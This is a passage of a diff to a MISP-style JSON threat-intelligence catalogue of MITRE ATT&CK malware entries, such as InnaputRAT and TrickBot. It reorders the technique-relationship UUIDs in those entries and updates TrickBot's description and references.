"dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20784,27 +23408,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "bfd2738c-8b43-43c3-bc9f-d523c8e88bf4", @@ -20827,21 +23430,7 @@ }, "related": [ { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20854,13 +23443,6 @@ ], "type": "uses" }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "519630c5-f03f-4882-825c-3af924935817", "tags": [ @@ -20869,49 +23451,7 @@ "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -20924,12 +23464,75 @@ ], "type": "uses" }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "0817aaf2-afea-4c32-9285-4dcd1df5bf14", @@ -21006,13 +23609,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ @@ -21027,6 +23623,13 @@ ], "type": "uses" }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ @@ -21055,6 +23658,41 @@ ] }, "related": [ + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ @@ -21063,14 +23701,21 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21090,13 +23735,6 @@ ], "type": "uses" }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", "tags": [ @@ -21104,34 +23742,6 @@ ], "type": "uses" }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ @@ -21140,21 +23750,7 @@ "type": "uses" }, { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21168,28 +23764,14 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21202,6 +23784,13 @@ ], "type": "uses" }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "tags": [ @@ -21210,21 +23799,49 @@ "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21250,20 +23867,6 @@ ] }, "related": [ - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ @@ -21272,7 +23875,7 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21285,6 +23888,20 @@ ], "type": "uses" }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "9b52fca7-1a36-4da0-b62d-da5bd83b4d69", "tags": [ @@ -21300,49 +23917,14 @@ "type": "uses" }, { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21355,12 +23937,47 @@ ], "type": "uses" }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "92b55426-109f-4d93-899f-1833ce91ff90", @@ -21383,20 +24000,6 @@ ] }, "related": [ - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", "tags": [ @@ -21404,41 +24007,6 @@ ], "type": "uses" }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ @@ -21452,6 +24020,55 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa", @@ -21474,28 +24091,14 @@ }, "related": [ { - "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21516,14 +24119,7 @@ "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21537,14 +24133,7 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21557,20 +24146,6 @@ ], "type": "uses" }, - { - "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ @@ -21578,6 +24153,34 @@ ], "type": "uses" }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ @@ -21585,12 +24188,26 @@ ], "type": "uses" }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "5189f018-fea2-45d7-b0ed-23f9ee0a46f3", @@ -21640,14 +24257,7 @@ }, "related": [ { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21661,7 +24271,7 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21674,6 +24284,13 @@ ], "type": "uses" }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ @@ -21708,13 +24325,6 @@ ], "type": "uses" }, - { - "dest-uuid": "c4b96c0b-cb58-497a-a1c2-bb447d79d692", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b3c2e5de-0941-4b57-ba61-af029eb5517a", "tags": [ @@ -21730,7 +24340,7 @@ "type": "uses" }, { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21744,7 +24354,14 @@ "type": "uses" }, { - "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c4b96c0b-cb58-497a-a1c2-bb447d79d692", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21770,13 +24387,6 @@ ] }, "related": [ - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ @@ -21784,41 +24394,6 @@ ], "type": "uses" }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ @@ -21826,6 +24401,13 @@ ], "type": "uses" }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ @@ -21833,19 +24415,54 @@ ], "type": "uses" }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "c8b6cc43-ce61-42ae-87f3-a5f10526f952", "value": "InnaputRAT - S0259" }, { - "description": "[TrickBot](https://attack.mitre.org/software/S0266) is a Trojan spyware program that has mainly been used for targeting banking sites in Australia. TrickBot first emerged in the wild in September 2016 and appears to be a successor to [Dyre](https://attack.mitre.org/software/S0024). [TrickBot](https://attack.mitre.org/software/S0266) is developed in the C++ programming language. (Citation: S2 Grupo TrickBot June 2017) (Citation: Fidelis TrickBot Oct 2016) (Citation: IBM TrickBot Nov 2016)", + "description": "[TrickBot](https://attack.mitre.org/software/S0266) is a Trojan spyware program that has mainly been used for targeting banking sites in United States, Canada, UK, Germany, Australia, Austria, Ireland, London, Switzerland, and Scotland. TrickBot first emerged in the wild in September 2016 and appears to be a successor to [Dyre](https://attack.mitre.org/software/S0024). [TrickBot](https://attack.mitre.org/software/S0266) is developed in the C++ programming language. (Citation: S2 Grupo TrickBot June 2017) (Citation: Fidelis TrickBot Oct 2016) (Citation: IBM TrickBot Nov 2016)", "meta": { "external_id": "S0266", "mitre_platforms": [ @@ -21857,6 +24474,7 @@ "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_trickload.n", + "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Totbrick" ], "synonyms": [ @@ -21867,14 +24485,28 @@ }, "related": [ { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21895,28 +24527,7 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21930,21 +24541,14 @@ "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ 